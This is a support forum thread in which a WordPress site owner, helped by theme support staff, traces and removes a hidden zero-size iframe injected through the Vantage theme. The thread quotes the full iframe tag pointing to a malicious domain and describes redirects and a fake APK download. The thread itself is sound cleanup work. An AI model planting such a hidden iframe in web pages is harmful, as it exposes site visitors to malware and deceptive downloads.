Page Builder 
Widgets Bundle 
SiteOrigin CSS 
Installer Google malware warning – hidden iframe found in source
Hi, I have a website that received a google warning from an outside link page.
http://imsone.com/images/image001.png
I ran a Sucuri scan from their site https://sitecheck.sucuri.net/results/ and it found malicious code. I looked at the source code for the homepage and found the iframe.
iframe source is this –“http://xzczxzcfsqeywrssd.ml/search?q=cFRdRHE&RYviF7T=341601a7c&Qts5FiS=aDFcAAx5ICVRcGlANGU&FwWP0zh=bEeBRxMH1oC&OTb9mN=38e45028c9&MF4K6=d4WFRVQS1QI” width=”0″ height=”0″ frameborder=”0″ marginwidth=”0″ marginheight=”0″ scrolling=”no”–
The site is walter4dublin.com.
Can I delete this from one of my php files or do you recommend a plugin like Sucuri at a cost?
Thanks again.
This is our free support forum. Replies can take several days.
Need fast email support? Get SiteOrigin Premium
Replies
10Hi Mj
It could be in footer.php, start by checking that via Appearance > Editor.
It could also be injected via the footer action hook, that’ll be harder to find. Let me know how the first check goes.
I did find a string of code at the bottom of the Vantage Premium footer in Editor in the following order:
http://imsone.com/images/1.png
http://imsone.com/images/2.png
http://imsone.com/images/3.png
http://imsone.com/images/4.png
It’s not the code that appears in the actual source but it is several rows down (a lot blank space from the ….?php wp_footer(); ?….
I am using a child theme though.
wp_footer is an action hook. I’m not a security expert at all but any function inserted in a plugin or theme file could use that hook to insert a script. It might be worth running through something like:
https://codex.wordpress.org/FAQ_My_site_was_hacked
Alternatively, a quick check might be to:
1. Switch back to the parent theme.
2. De-activate all plugins not by SiteOrigin.
3. Check the source, see if the problem is still present.
Ok, I tried these. Unfortunately, the code is still there. The iframe changes periodically. Viewers are getting redirected to various sites. Chrome gives a warning – lvmktegretshjsdh.tk might attempt to install dangerous programs on your computer. From an android phone – you get asked to download the new google_store.apk.
The code doesn’t seem to be in the open. I looked through the footers on both parent theme and child theme in the editor. Other suggestions?
Thanks!
Update: iframe code appears on multiple pages, not just the homepage, in the source code. It’s at the very bottom hidden from the primary code.
If you haven’t done so already, try:
1. Switching themes to a default WordPress theme. Does the issue persist?
2. Temporarily de-activate all plugins at once. Does the issue persist.
The above test might help pinpoint if the issue lies in the theme or a plugin.
I installed and activated theme twentyfifteen and the malicious iframe code DOES NOT show up. I did not deactivate any plugins prior to or after testing twentyfifteen.
Super. Let’s re-install Vantage.
You can find the premium ZIP here:
Private Snippet
and manual update instructions here:
Page: Updating a Theme Using a ZIP File
Awesome! It worked.
Seriously appreciate your help. I’m yet to have a problem you guys can’t solve!
I uploaded the zip of the Premium theme. Activated it and checked for the malicious code and it was gone. Then I activated my child theme, again checking the source code, and it’s clean.
Thanks again!
Fantastic :) Really glad to hear that helped.
All the best.
Replies on this thread are closed.
Please create a new thread if you have a question, or purchase a SiteOrigin Premium license if you need one-on-one email support.